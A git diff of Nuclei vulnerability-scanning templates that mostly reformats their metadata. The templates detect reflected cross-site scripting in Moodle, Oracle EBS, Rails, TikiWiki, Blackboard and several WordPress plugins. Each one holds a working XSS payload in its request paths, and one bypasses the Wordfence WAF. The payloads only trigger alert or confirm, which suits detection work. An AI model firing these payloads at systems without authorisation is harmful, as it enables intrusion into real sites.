type: status + status: + - 500 diff --git a/poc/xss/moodle-filter-jmol-xss-8942.yaml b/poc/xss/moodle-filter-jmol-xss-8942.yaml index 3cb4bfb590..e5153a78ec 100644 --- a/poc/xss/moodle-filter-jmol-xss-8942.yaml +++ b/poc/xss/moodle-filter-jmol-xss-8942.yaml @@ -1,4 +1,5 @@ id: moodle-filter-jmol-xss + info: name: Moodle filter_jmol - XSS author: madrobot @@ -6,20 +7,24 @@ info: description: Cross-site scripting on Moodle. reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ tags: moodle,xss + requests: - method: GET path: - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "<script>alert('XSS')</script>" part: body + - type: word part: header words: - - "text/html" + - "text/html" \ No newline at end of file diff --git a/poc/xss/moodle-xss-8948.yaml b/poc/xss/moodle-xss-8948.yaml index bb07fda91a..a9e2314e9e 100644 --- a/poc/xss/moodle-xss-8948.yaml +++ b/poc/xss/moodle-xss-8948.yaml @@ -1,18 +1,16 @@ id: moodle-xss - info: - name: Moodle redirect_uri Reflected XSS + name: Moodle redirect_uri - Cross-Site Scripting author: hackergautam - description: XSS in moodle via redirect_uri parameter severity: medium + description: XSS in moodle via redirect_uri parameter + reference: + - https://twitter.com/JacksonHHax/status/1391367064154042377 tags: moodle,xss - reference: https://twitter.com/JacksonHHax/status/1391367064154042377 - requests: - method: GET path: - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')" - matchers-condition: and matchers: - type: word @@ -21,11 +19,9 @@ requests: - '{{randstr}}' - '<form action="javascript:alert' condition: and - - type: status status: - 200 - - type: word part: header words: diff --git a/poc/xss/my-chatbot-xss-8978.yaml b/poc/xss/my-chatbot-xss-8978.yaml index bb9d481125..adb3a0d840 100644 --- a/poc/xss/my-chatbot-xss-8978.yaml +++ b/poc/xss/my-chatbot-xss-8978.yaml @@ -1,11 +1,16 @@ id: my-chatbot-xss info: - name: My Chatbot <= 1.1 - Reflected Cross-Site Scripting (XSS) + name: WordPress My Chatbot <= 1.1 - Reflected Cross-Site Scripting author: dhiyaneshDk severity: medium - description: The plugin does not sanitise or escape its tab parameter in the Settings page before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue. - reference: https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d + description: WordPress My Chatbot <= 1.1 is susceptible to cross-site scripting. The plugin does not sanitize or escape its tab parameter in the Settings page before outputting it back in an attribute. + reference: + - https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 tags: wordpress,wp-plugin,xss,authenticated requests: @@ -38,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/poc/xss/oracle-ebs-xss-9373.yaml b/poc/xss/oracle-ebs-xss-9373.yaml index c41cfe14d7..23bd3eea02 100644 --- a/poc/xss/oracle-ebs-xss-9373.yaml +++ b/poc/xss/oracle-ebs-xss-9373.yaml @@ -1,25 +1,29 @@ id: oracle-ebs-xss + info: - name: Oracle EBS XSS + name: Oracle EBS - Cross-Site Scripting author: dhiyaneshDk severity: medium - tags: oracle,xss,ebs - reference: | + reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + tags: oracle,xss,ebs + requests: - method: GET path: - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" + matchers-condition: and matchers: - type: word words: - "<svg/onload=alert('{{randstr}}')>" part: body + - type: status status: - 200 diff --git a/poc/xss/parentlink-xss-9466.yaml b/poc/xss/parentlink-xss-9466.yaml index fcfbc601ee..9b9766f693 100644 --- a/poc/xss/parentlink-xss-9466.yaml +++ b/poc/xss/parentlink-xss-9466.yaml @@ -1,25 +1,32 @@ id: parentlink-xss + info: name: Blackboard ParentLink Reflected XSS author: r3naissance severity: medium + reference: + - https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes tags: blackboard,parentlink,xss - reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes + requests: - method: GET path: - '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E' - '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E' + matchers-condition: and matchers: + - type: word words: - '<img src=c onerror=alert(8675309)>' part: body + - type: word words: - "text/html" part: header + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/xss/php-timeclock-xss-9554.yaml b/poc/xss/php-timeclock-xss-9554.yaml index 55686517b4..cd2b29358f 100644 --- a/poc/xss/php-timeclock-xss-9554.yaml +++ b/poc/xss/php-timeclock-xss-9554.yaml @@ -1,5 +1,4 @@ id: php-timeclock-xss - info: name: PHP Timeclock 1.04 XSS author: pikpikcu @@ -7,12 +6,10 @@ info: description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities reference: https://www.exploit-db.com/exploits/49853 tags: xss,php,timeclock - requests: - method: GET path: - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E" - matchers-condition: and matchers: - type: status @@ -24,7 +21,6 @@ requests: - "PHP Timeclock Admin Login" part: body condition: and - - type: word words: - "text/html" diff --git a/poc/xss/rails6-xss-9800.yaml b/poc/xss/rails6-xss-9800.yaml index 6bc1c7b911..e6a188d876 100644 --- a/poc/xss/rails6-xss-9800.yaml +++ b/poc/xss/rails6-xss-9800.yaml @@ -1,24 +1,19 @@ id: rails6-xss - -# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); -# Nuclei has issues with 302 response missing a Location header thus the -# extended payload to make Nuclei work. -# Working poc by @Mad-robot -# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 - info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: - - https://hackerone.com/reports/904059 + reference: https://hackerone.com/reports/904059 tags: rails,xss,crlf - + # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); + # Nuclei has issues with 302 response missing a Location header thus the + # extended payload to make Nuclei work. + # Working poc by @Mad-robot + # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 requests: - method: POST path: - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" - matchers-condition: and matchers: - type: word diff --git a/poc/xss/sick-beard-xss-10234.yaml b/poc/xss/sick-beard-xss-10234.yaml index 077ac871aa..9ff750dba9 100644 --- a/poc/xss/sick-beard-xss-10234.yaml +++ b/poc/xss/sick-beard-xss-10234.yaml @@ -3,12 +3,12 @@ info: name: Sick Beard XSS author: pikpikcu severity: medium + tags: xss reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link metadata: shodan-query: sickbeard - tags: xss requests: - method: GET path: diff --git a/poc/xss/tikiwiki-reflected-xss-10780.yaml b/poc/xss/tikiwiki-reflected-xss-10780.yaml index 0e6d4645ea..6283ecd6fd 100644 --- a/poc/xss/tikiwiki-reflected-xss-10780.yaml +++ b/poc/xss/tikiwiki-reflected-xss-10780.yaml @@ -1,13 +1,17 @@ id: tikiwiki-reflected-xss + info: name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting author: madrobot severity: medium + tags: xss,tikiwiki + requests: - method: GET path: - "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" - "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E" + matchers-condition: and matchers: - type: status @@ -17,3 +21,7 @@ requests: words: - "<script>alert(31337)</script>" part: body + - type: word + words: + - "text/html" + part: header diff --git a/poc/xss/turbocrm-xss-10848.yaml b/poc/xss/turbocrm-xss-10848.yaml index a44e962186..2f99cb2f82 100644 --- a/poc/xss/turbocrm-xss-10848.yaml +++ b/poc/xss/turbocrm-xss-10848.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. - reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + reference: + - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a tags: xss,turbocrm requests: diff --git a/poc/xss/wems-manager-xss-11194.yaml b/poc/xss/wems-manager-xss-11194.yaml index 8b70fab0a9..40f9ddb9bb 100644 --- a/poc/xss/wems-manager-xss-11194.yaml +++ b/poc/xss/wems-manager-xss-11194.yaml @@ -1,12 +1,12 @@ id: wems-manager-xss info: - name: WEMS Enterprise Manager - Cross-Site Scripting + name: WEMS Enterprise Manager XSS author: pikpikcu severity: medium + tags: xss description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html - tags: xss requests: - method: GET path: diff --git a/poc/xss/window-name-domxss-11213.yaml b/poc/xss/window-name-domxss-11213.yaml index 281671033b..fd4965559e 100644 --- a/poc/xss/window-name-domxss-11213.yaml +++ b/poc/xss/window-name-domxss-11213.yaml @@ -17,49 +17,50 @@ headless: args: hook: true code: | - (function() {window.alerts = []; + () => { + window.alerts = []; - function logger(found) { - window.alerts.push(found); - } + logger = found => window.alerts.push(found); - function getStackTrace () { - var stack; - try { - throw new Error(''); - } - catch (error) { - stack = error.stack || ''; + function getStackTrace() { + var stack; + try { + throw new Error(''); + } + catch (error) { + stack = error.stack || ''; + } + stack = stack.split('\n').map(function (line) { return line.trim(); }); + return stack.splice(stack[0] == 'Error' ? 2 : 1); } - stack = stack.split('\n').map(function (line) { return line.trim(); }); - return stack.splice(stack[0] == 'Error' ? 2 : 1); - } - window.name = "{{randstr_1}}'\"<>"; + window.name = "{{randstr_1}}'\"<>"; - var oldEval = eval; - var oldDocumentWrite = document.write; - var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set; - Object.defineProperty(Element.prototype, 'innerHTML', { - set: function innerHTML_Setter(val) { - if (val.includes("{{randstr_1}}'\"<>")) { - logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()}); + var oldEval = eval; + var oldDocumentWrite = document.write; + var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set; + Object.defineProperty(Element.prototype, 'innerHTML', { + set: function innerHTML_Setter(val) { + if (val.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()}); + } + return setter.call(this, val) } - return setter.call(this, val) - } - }); - eval = function(data) { - if (data.includes("{{randstr_1}}'\"<>")) { - logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()}); - } - return oldEval.apply(this, arguments); - }; - document.write = function(data) { - if (data.includes("{{randstr_1}}'\"<>")) { - logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()}); - } - return oldEval.apply(this, arguments); - }; - })(); + }); + + eval = function(data) { + if (data.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()}); + } + return oldEval.apply(this, arguments); + }; + + document.write = function(data) { + if (data.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()}); + } + return oldEval.apply(this, arguments); + }; + } - args: url: "{{BaseURL}}" action: navigate @@ -67,7 +68,7 @@ headless: - action: script name: alerts args: - code: "window.alerts" + code: window.alerts matchers: - type: word part: alerts diff --git a/poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml b/poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml index ef0527d5a1..6f3cc78548 100644 --- a/poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml +++ b/poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml @@ -1,10 +1,9 @@ id: wordpress-wordfence-waf-bypass-xss info: - name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam + name: Wordfence WAF Bypass WordPress XSS + reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium - reference: - - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET diff --git a/poc/xss/wordpress-zebra-form-xss-11379.yaml b/poc/xss/wordpress-zebra-form-xss-11379.yaml index eb070bb0f2..4094c066d1 100644 --- a/poc/xss/wordpress-zebra-form-xss-11379.yaml +++ b/poc/xss/wordpress-zebra-form-xss-11379.yaml @@ -1,11 +1,13 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html tags: wordpress,xss + requests: - raw: - | @@ -35,4 +37,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/poc/xss/wp-church-admin-xss-11422.yaml b/poc/xss/wp-church-admin-xss-11422.yaml index 6dfb09ebcb..350e16aad1 100644 --- a/poc/xss/wp-church-admin-xss-11422.yaml +++ b/poc/xss/wp-church-admin-xss-11422.yaml @@ -3,8 +3,7 @@ info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html + reference: https://www.securityfocus.com/bid/54329/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/xss/wp-code-snippets-xss-11425.yaml b/poc/xss/wp-code-snippets-xss-11425.yaml index b3552bcadb..ebf8c132fd 100644 --- a/poc/xss/wp-code-snippets-xss-11425.yaml +++ b/poc/xss/wp-code-snippets-xss-11425.yaml @@ -1,11 +1,15 @@ id: wp-code-snippets-xss + info: - name: Code Snippets Wordpress Plugin - XSS + name: Code Snippets Wordpress Plugin - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link - reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ + description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, + which will execute within the browser of any logged-in admin who views the link + reference: + - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ tags: wordpress,xss,wp-plugin,authenticated + requests: - raw: - | @@ -16,9 +20,11 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}} + cookie-reuse: true matchers-condition: and matchers: @@ -26,10 +32,15 @@ requests: part: body words: - '</script><script>alert(document.domain)</script>' + - 'toplevel_page_snippets' + - 'Search results in tag' + condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/xss/wp-finder-xss-11450.yaml b/poc/xss/wp-finder-xss-11450.yaml old mode 100755 new mode 100644 index c2141ac880..0111970059 --- a/poc/xss/wp-finder-xss-11450.yaml +++ b/poc/xss/wp-finder-xss-11450.yaml @@ -1,29 +1,24 @@ id: wp-finder-xss - info: name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/55217/info + reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin - requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' - + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "<script>alert(123);</script>" + - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-phpfreechat-xss-11524.yaml b/poc/xss/wp-phpfreechat-xss-11524.yaml index c908448c5d..6deb475d0b 100644 --- a/poc/xss/wp-phpfreechat-xss-11524.yaml +++ b/poc/xss/wp-phpfreechat-xss-11524.yaml @@ -4,7 +4,8 @@ info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/54332/info + reference: + - https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin requests: diff --git a/poc/xss/wpmudev-my-calender-xss-11502.yaml b/poc/xss/wpmudev-my-calender-xss-11502.yaml index 238ee01e7c..e17d0a5479 100644 --- a/poc/xss/wpmudev-my-calender-xss-11502.yaml +++ b/poc/xss/wpmudev-my-calender-xss-11502.yaml @@ -1,24 +1,29 @@ -id: my-calender-xss -info: - name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS) - author: dhiyaneshDk - severity: medium - reference: https://wpscan.com/vulnerability/9267 - tags: wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E' - matchers-condition: and - matchers: - - type: word - words: - - "<svg/onload=confirm(/{{randstr}}/)>" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 +id: my-calender-xss + +info: + name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + reference: https://wpscan.com/vulnerability/9267 + tags: wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "<svg/onload=confirm(/{{randstr}}/)>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200
troy + serial server